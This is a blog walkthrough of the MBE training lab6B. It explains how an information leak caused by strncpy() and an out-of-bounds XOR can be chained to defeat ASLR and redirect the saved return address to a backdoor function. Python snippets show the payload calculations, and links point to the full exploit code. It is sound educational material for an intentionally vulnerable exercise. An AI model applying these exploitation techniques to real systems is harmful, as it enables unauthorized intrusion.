The XOR madness of MBE's tricky lab6B - a walkthrough
This post is a continuation of my MBE (Modern Binary Exploitation) walkthrough series. For an introduction, please see the previous post: https://hackingiscool.pl/mbe-lab6c-walkthrough/.
A look at the target app
So let's get right to it. The source code of the target application can be found here: https://github.com/RPISEC/MBE/blob/master/src/lab06/lab6B.c. The lab6B.readme reveals that this time we are not dealing with a suid binary. Instead, we are supposed to compromise a service running on port 6642.
Let's see if we can interact with it from our MBE VM command line:
Nice, it's working.
Running locally
Our target application is not actually capable of networking. This is covered by socat:
socat TCP-LISTEN:6642,reuseaddr,fork,su=lab6A EXEC:"timeout 300 /levels/lab06/lab6B"
To better understand how the target program behaves, and to make exploit development easier, let's compile our own version in /tmp.
The only change required is the hardcoded /home/lab6A/.pass path - assuming that we are doing our development from the MBE VM, using the lab6B account, we won't have the privileges to read that file:
I just replaced it with pass.txt (the file needs to exist, be nonempty and readable for the program to work properly):
The source code overview
Now, the source code. Just like lab6C.c with its secret_backdoor(), this program ships with a backdoor function as well (here it is called login()), so all we are gonna need is execution control:
Then we have the hash_pass() function. It takes two pointers to buffers (password and username) and XORs each byte of the password buffer with the corresponding byte from the username buffer. The crucial property here is that the XOR operation will keep going until a nullbyte is encountered at the password[i] index:
If a nullbyte is encountered under username[i] first, the rest of the password is XOR-ed with a hardcoded value of 0x44.
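To make the two phases easier to follow, here is a minimal Python model of the scheme as described above. It is only a sketch: the bounds checks exist solely to keep Python from raising an IndexError (the C code has no such checks), and the sample password is made up.

```python
def hash_pass(password: bytearray, username: bytes) -> None:
    """Python model of the XOR scheme: in place, driven only by nullbytes."""
    i = 0
    # Phase 1: XOR with the username for as long as both bytes are non-null.
    while i < len(password) and i < len(username) and password[i] and username[i]:
        password[i] ^= username[i]
        i += 1
    # Phase 2: XOR whatever is left of the password with the 0x44 pad byte.
    while i < len(password) and password[i]:
        password[i] ^= 0x44
        i += 1


# Made-up sample input, NUL-terminated like a C string.
pw = bytearray(b"secretpassword\x00")
hash_pass(pw, b"lab6A\x00")
print(pw.hex())
```

Note that neither loop looks at a buffer size: the only thing that stops them is a nullbyte found before the XOR of the current index.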
Then there's the lengthy load_pass() function, which simply reads the contents of the /home/lab6A/.pass file into a buffer handed back through the only argument this function takes:
Now, this is what the main() function looks like:
It loads the local user password into the secretpw buffer and hashes it with the hardcoded "lab6A" string (the target username). Then it calls the login_prompt() function, passing the original password size and the hash to it.
Then finally we have the login_prompt() function. It reads the username and the password into local buffers, using strncpy() to copy no more bytes than the destination buffer can hold, in order to avoid an overflow. Then it calls the hash_pass() function on the buffers. Then it compares (memcmp()) the result with the password hash pointed to by the second login_prompt() argument, also making sure that it compares exactly as many bytes as it should (pwsize):
The first vuln
And honestly, I could not figure out where the vulnerability was. So I peeked into Corb3nik's solution https://github.com/Corb3nik/MBE-Solutions/blob/master/lab6b/solution.py only to notice the following part:
By the way, since the original version kept complaining about input arguments (this was before I read the usage comment), I simply modified it into a 'remote' variant, with a hardcoded remote() method of interaction and a hardcoded 127.0.0.1:6642 target: https://github.com/ewilded/MBE-snippets/blob/master/lab6B/solution.py. Either way, it works like a charm. Now let's find out how and why.
So, after sending the first set of credentials, the exploit parses the output from the application (p.recvline()) as a memory leak, right after encountering the "Authentication failed for user" string (individual byte ranges are saved in variables named after the local variables stored on login_prompt()'s stack). This made me see the light and instantly revealed the first vulnerability - which, by the way, also makes the second vulnerability possible to exploit, but we'll get to that in due course.
The local readbuff buffer is 128 bytes long. Both username and password are 32 bytes long:
Now, what happens next is that fgets() reads a string from user input, saving it in the readbuff buffer. To make the user input saved in readbuff an actual string, fgets() will terminate it with a nullbyte. This means that if we provide, let's say, 60 characters of username, fgets() will make sure byte 61 is 0, so the string is terminated:
This itself is not an issue. However, what happens next is strncpy() blindly copying up to 32 bytes from readbuff to username, without appending a terminating nullbyte when the source string is 32 bytes or longer. The same goes for password.
This means that if we provide at least 32 bytes both as username and password, both 32-byte buffers, username + password, form a contiguous 64-byte block of memory without a single nullbyte. Depending on the values stored next to it (in this case attempts and result, and anything that follows), the contiguous non-null memory block can be longer - and printable.
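The effect is easy to reproduce with a small Python model of strncpy(). This is a sketch under assumptions: the 64-byte `stack` bytearray and the offsets 0 and 32 are just a stand-in for the two adjacent buffers, and the inputs are made up.

```python
def strncpy(dest: bytearray, offset: int, src: bytes, n: int) -> None:
    """Model of C strncpy(): copy at most n bytes, zero-pad only if src is shorter."""
    end = src.find(b"\x00")
    string = src if end == -1 else src[:end]
    chunk = string[:n]
    # No terminator is written when the source string has n or more bytes.
    dest[offset:offset + n] = chunk + b"\x00" * (n - len(chunk))


# Stand-in layout: username at offset 0, password right behind it at offset 32.
stack = bytearray(64)
readbuff = b"B" * 40 + b"\n\x00"    # what fgets() would leave in readbuff
strncpy(stack, 0, readbuff, 32)     # username
readbuff = b"C" * 40 + b"\n\x00"
strncpy(stack, 32, readbuff, 32)    # password
print(0 in stack)  # False
```

With inputs shorter than 32 bytes the same function pads the rest with zeros, which is why short credentials never expose anything.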
Every time the hash comparison fails, the address of the username buffer is passed to a printf() call:
Provided with a pointer to the username buffer and the %s formatting modifier, printf() will keep printing memory starting at username and will only stop once it encounters a nullbyte on its way. Hence the memory leak necessary for us to obtain the information required to defeat ASLR (as we must provide the current, valid address of the login() function to EIP).
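Here is a rough Python model of what %s does with that pointer. The memory snapshot is hypothetical (a 32-byte username, a 32-byte already hashed password, two integers and a few more bytes), not a dump from the real process.

```python
def printf_s(memory: bytes, start: int) -> bytes:
    """Model of printf("%s"): emit bytes from start up to the first nullbyte."""
    end = memory.find(b"\x00", start)
    return memory[start:] if end == -1 else memory[start:end]


# Hypothetical snapshot: username | hashed password | two ints | more stack data
memory = (b"\x42" * 32 + b"\xbd" * 32
          + bytes.fromhex("42424242" "43424242")
          + b"\x79\x2e\x00\x80")
leak = printf_s(memory, 0)
print(len(leak))  # 74
```

Everything up to the first nullbyte comes back to us, which is far more than the 32 bytes of username the program meant to print.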
Running the app
Before we proceed any further, let's get a feel for how all this data is aligned on the stack.
Let's put our first breakpoint here (between the strncpy() and hash_pass() calls):
Which would be this place in login_prompt() (at offset 278, right after the second strncpy() call is complete):
We can set a breakpoint on an offset, without first loading the program and using a full address, like below:
OK, run:
The breakpoint is hit, so let's have a look at the stack and identify what's what:
To confirm whether the value we think is the saved RET is in fact the saved RET, let's simply check the address of the next instruction after the login_prompt() call:
Yup. So we know how data is aligned on the stack when hash_pass() is about to be called.
Fair enough, let's create a second breakpoint - right after the hash_pass() call - to see how it affects the values on the stack (break *(login_prompt+296)):
And once it's hit, we can see that the password (originally consisting of capital 'C's) was hashed with the username (capital 'B's), as were the two integer values (attempts and result) and the stuff that follows them:
Even the trailing 0x80002f78 was changed to 0x80002e79 as a result of the XOR operation. The XOR stopped on the nullbyte in 0x80002e79, leaving the 0x80 part intact.
At this point I got really worried about my understanding of the issue. How are we supposed to leak any memory layout information like the saved RET, the saved EBP or anything else revealing the current base address, if we run into a nullbyte earlier on our way? We are always going to run into nullbytes, as the saved RET contains one due to the code segment base address containing one:
Then I noticed that the code segment has in fact a non-null base (just like the other maps) when we attach to an already running process instead of starting it from gdb (if you know the reason for this behavior, please let me know).
As my goal was to figure out the exploitation myself, using Corb3nik's exploit for clues only as a last resort, I tried to develop the rest of the code myself, starting with this skeleton taken from his code:
https://github.com/ewilded/MBE-snippets/blob/master/lab6B/leaktest.py.
Setting pwnlib's context.log_level variable to debug gives us a great additional feedback channel during exploit troubleshooting and development.
Here's a sample run of this exploit skeleton (note the entire [DEBUG] output; the script itself does not print anything explicitly except for "The pid is: ..."):
By the way, because I wanted to attach gdb to the target process before inducing the out-of-bounds read (so I could continue developing the exploit from that point), I made the script print out the PID and pause, waiting for a key to be pressed:
This way we can conveniently attach to the process from a second console:
Again, breakpoints:
And the stack (the saved RET, i.e. the address of the next instruction after the login_prompt() call, is marked red):
The second vuln
Now let's see how the stack changed after the first hash_pass() call (breakpoint 2):
First, we have our username buffer (32 bytes of 0x42 value) intact. Then we have the password buffer. It's also 32 bytes, originally of the 0xff value we sent in our payload... now turned into 0xbd.
The 32 bytes of password got XOR-ed with their corresponding username bytes. 0x42 XOR 0xff = 0xbd. So far so good.
But what happens next, when i becomes 32 and keeps incrementing, because no nullbyte was encountered under either password[i] or username[i]?
username[32] points at password[0], username[33] points at password[1] and so on. And password[32] points at the first byte of result, password[36] points at the first byte of attempts and so on. XOR keeps XOR-ing.
Let's have a look at the two signed integer values (result and attempts), previously 0xffffffff and 0xfffffffe. Now they're 0x42424242 and 0x42424243, respectively:
So, how did their bytes turn from 0xff to 0x42? Had they been XOR-ed with 0x42 (username), they would now be 0xbd, just like the password bytes. And had they been XOR-ed with their own value, they would now be nullbytes (which we don't want, by the way), because any value XOR-ed with itself becomes 0.
They were originally 0xff and became 0x42 because they were XOR-ed with 0xbd (to check what value they were XOR-ed with, we can simply XOR the current value with the old value, 0x42 XOR 0xff = 0xbd):
So, the bytes that follow the password buffer (including the two integers, saved EBP and the saved RET) got XOR-ed with the contents of the password buffer... after the password buffer was XOR-ed with the username buffer.
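The whole chain can be replayed in a few lines of Python. This is a sketch under assumptions: one flat bytearray stands in for the stack frame, the layout (username, password, result, attempts, then a zero dword that stops the loop) is simplified, and hash_pass() is modeled with offsets instead of pointers so that it can run past the 32-byte buffers just like the C code does.

```python
import struct


def hash_pass(mem: bytearray, password: int, username: int) -> None:
    """Model of hash_pass() working on offsets into one flat memory region."""
    i = 0
    while mem[password + i] and mem[username + i]:
        mem[password + i] ^= mem[username + i]
        i += 1
    while mem[password + i]:
        mem[password + i] ^= 0x44
        i += 1


# Simplified layout: username | password | result | attempts | zero dword
mem = bytearray(b"\x42" * 32 + b"\xff" * 32
                + struct.pack("<II", 0xFFFFFFFF, 0xFFFFFFFE)
                + b"\x00" * 4)
hash_pass(mem, password=32, username=0)

result, attempts = struct.unpack_from("<II", mem, 64)
print(hex(result), hex(attempts))  # 0x42424242 0x42424243
```

For i between 0 and 31 the password is XOR-ed with the username (0xff becomes 0xbd). From i = 32 onwards username[i] is already the hashed password, so the integers behind the password buffer get XOR-ed with 0xbd.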
And this is how we attained the second vulnerability - which, as we can see, allows us to change the saved RET!
Look again, the saved RET got changed as well (marked blue):
Its original value was 0xb77cdf7e, now it's 0x0ac162c3. Again, we can run a simple test to see what value it got XOR-ed with:
Yup, it was 0xbd (username XOR password).
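This kind of check fits in a few lines of Python, using the two saved RET values quoted above:

```python
original_ret = 0xB77CDF7E   # saved RET before the hash_pass() call
xored_ret = 0x0AC162C3      # saved RET after the hash_pass() call

# XOR-ing the old value with the new one reveals the key that was applied.
key = original_ret ^ xored_ret
print(hex(key))             # 0xbdbdbdbd
print(hex(0x42 ^ 0xFF))     # 0xbd
```

Every byte of the saved RET was XOR-ed with the same 0xbd, because every byte of the hashed password buffer holds that value.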
So, the second vulnerability is an out-of-bounds XOR in the hash_pass() function.
An XOR with a buffer that we control. So it is effectively an out-of-bounds write (a XOR-chained stack-based buffer overflow).
And funnily, it has the same root cause: relying on whether or not a particular consecutive byte is null instead of enforcing a maximum size boundary for the write.
Understanding the exploitation process and implementing it
In order to trigger both the out-of-bounds read and the out-of-bounds XOR, we must provide 32 non-null bytes of username and then 32 non-null bytes of password.
Also, no byte at username[i] can have its corresponding byte in password[i] equal to it (that would lead to the relevant password[i] becoming a nullbyte as a result of the XOR operation, cutting us off from the further bytes on the stack).
This way the following things will happen:
1) password will get XOR-ed with username
2) the bytes on the stack following the just XOR-ed password buffer (attempts, result, login_prompt() parameters, saved EBP and saved RET) will get XOR-ed with the new contents of the password buffer - which is, again, what we provide as password XOR-ed with what we provide as username.
3) Since this authentication attempt will fail, the printf() call will print out everything starting from the username buffer, through the XOR-ed password, to the rest of the values on the stack XOR-ed with the XOR-ed password, up until a nullbyte is encountered.
So we use the out-of-bounds printf() to actually obtain, among others, the saved RET. All these values are XOR-ed with the result of the username XOR password operation.
At this point the program is in an incorrect state. The saved RET and saved EBP do not make sense. We will now have to trigger both vulnerabilities again with another authentication attempt, crafting the username and the password payloads in such a way that when the values on the stack (attempts and saved RET) are XOR-ed with the password buffer (which at that point will be the result of the XOR between the username and the password we provide), they become the arbitrary values we WANT them to be.
Yes, in addition to the saved RET becoming the current address of the login() function, we also want to control the attempts value, so the while loop can end:
The login_prompt() function will not attempt to return until the loop ends. And the return call is how we gain execution control via saved RET overwrite.
What we need to do now is:
1) use the leaked values to calculate the login() address
2) craft the second username and password 32-byte payloads in such a way that the current values on the stack (a copy of which we already got via the leak) - especially saved RET and attempts - once XOR-ed with the password buffer, become what we want them to be. Keep in mind that the password buffer will first get XOR-ed with the username buffer, so we'll need to consider this order while preparing the payload.
It all boils down to applying the correct values and the correct order of XOR-ing.
Let's start from the first payload again.
This time we'll use 'C' (0x43) as username and 0x11 as password:
Now, reading the values from the leak:
We know they are XOR-ed with 0x52, because 0x43 ('C', the username) XOR-ed with 0x11 produces 0x52. Again, these values can be arbitrary as long as they meet the conditions mentioned above. And once they are picked, the following decoding and encoding will depend on these values.
We know that XOR-ing anything with the same value twice produces the same value back again. So:
0x43 XOR 0x11 = 0x52
0x52 XOR 0x11 = 0x43
Knowing that hash_pass() encoded the stack variables with 0x52, we XOR them with 0x52 to make them make sense again:
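Decoding could look roughly like the sketch below. The 8 leaked bytes are hypothetical sample values (what result and attempts would look like after being XOR-ed with 0x52), not output captured from the service, and xor_bytes() is just a helper name made up for this example.

```python
import struct


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte of data with a single-byte key."""
    return bytes(b ^ key for b in data)


key = 0x43 ^ 0x11   # username byte XOR password byte = 0x52

# Hypothetical leak: the 8 bytes that follow the two 32-byte buffers.
leaked = bytes.fromhex("adadadad" "acadadad")
result, attempts = struct.unpack("<ii", xor_bytes(leaked, key))
print(result, attempts)  # -1 -2
```

Because XOR is its own inverse, the same xor_bytes() call works for both encoding and decoding.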
OK, time for the second payload. This time we'll use 'D' (0x44) as username, only to emphasize that it can differ here.
Obtaining the offset of the login() function:
Calculate the current ASLR-ed address of the login() function by preserving the 20 most significant bits of the original saved RET and adding the fixed offset 0xaf4 to them:
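As a sketch, the calculation looks like this in Python. It assumes that the saved RET and login() live on the same 4 KiB page of the code segment, which is what keeping the upper 20 bits implies; the sample saved RET is the value quoted earlier in this post, and login_address() is a helper name made up for this example.

```python
LOGIN_OFFSET = 0xAF4   # offset of login() within its page


def login_address(saved_ret: int) -> int:
    """Keep the upper 20 bits of the saved RET, swap in login()'s page offset."""
    return (saved_ret & 0xFFFFF000) | LOGIN_OFFSET


print(hex(login_address(0xB77CDF7E)))  # 0xb77cdaf4
```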
Now crafting the payloads for saved RET and attempts. We want a value which, when XOR-ed with the currently messed up saved RET on the stack, will turn it into the new_ret address. As we know the current value of the messed up saved RET (the xored_ret variable), we XOR it with new_ret and save the result in new_ret_payload. When this value gets XOR-ed with xored_ret on the stack by the hash_pass() call, the two XORs with xored_ret cancel each other out, leaving new_ret (this is why I titled it "madness"):
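A quick way to convince yourself that the two XORs cancel out is to replay them with sample numbers. The variable names follow the text above; the concrete values are only examples (the saved RET quoted earlier in this post, encoded with the 0x52 key).

```python
key = 0x52525252                  # 0x43 XOR 0x11, repeated over four bytes
original_ret = 0xB77CDF7E         # example saved RET from earlier in the post
xored_ret = original_ret ^ key    # what sits on the stack after attempt one
new_ret = 0xB77CDAF4              # where we want login_prompt() to return

# The value the hashed password buffer has to hold at the saved RET position.
new_ret_payload = xored_ret ^ new_ret

# What hash_pass() will do to the saved RET during the second attempt.
final_ret = xored_ret ^ new_ret_payload
print(hex(final_ret) == hex(new_ret))  # True
```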
Now the attempts value. We decode it with the 0x52 key from the first attempt, increment it by one (to get past the last, third iteration of the while loop instead of having to perform another dummy authentication attempt) and encode it back:
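The three steps can be sketched as follows. The leaked value is a hypothetical sample (0xfffffffe encoded with the 0x52 key), and the variable names are made up for this example.

```python
key = 0x52525252
xored_attempts = 0xADADADAC              # hypothetical value taken from the leak

attempts = xored_attempts ^ key          # decode: 0xfffffffe, i.e. -2
attempts = (attempts + 1) & 0xFFFFFFFF   # increment, staying within 32 bits
attempts_payload = attempts ^ key        # encode it back

print(hex(attempts_payload))  # 0xadadadad
```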
Now, one last layer of encoding. Before sending, we need to XOR everything with the username value we chose for the second attempt, so the hash_pass() call XOR-ing the password with it will reverse this process, making those values ready to be XOR-ed against the rest of the stack:
And lastly, we assemble the payload, fill it up to 32-bytes with some arbitrary character (e.g. 'E') and send it:
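The last two steps (the username layer and the assembly) could be sketched like this. Treat it as an illustration only: build_password() is a hypothetical helper, and the offsets 4 and 20 are placeholders, since the real positions depend on where attempts and the saved RET sit relative to the password buffer on the actual stack.

```python
import struct


def build_password(fields: dict, username_byte: int, pad: bytes = b"E") -> bytes:
    """Place 32-bit values at given offsets, each pre-XOR-ed with the username byte."""
    payload = bytearray(pad * 32)
    for offset, value in fields.items():
        encoded = bytes(b ^ username_byte for b in struct.pack("<I", value))
        payload[offset:offset + 4] = encoded
    # Nullbytes, newlines and bytes equal to the username byte break the chain.
    if any(b in (0x00, 0x0A, username_byte) for b in payload):
        raise ValueError("payload contains a forbidden byte")
    return bytes(payload)


# Placeholder offsets and sample values, 'D' (0x44) as the second username.
password = build_password({4: 0xADADADAD, 20: 0x525257D8}, username_byte=0x44)
print(password.hex())
```

Checking for forbidden bytes before sending saves a debugging session: a single byte equal to the username byte turns into a nullbyte after hashing and stops the XOR chain before it reaches the saved RET.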
And here we go. Triggering the leak and the first out-of-bounds XOR:
Receiving the leak:
Sending the second authentication attempt payload:
And we're done:
The full source code with comments can be found here:
https://github.com/ewilded/MBE-snippets/blob/master/lab6B/exploit_remote.py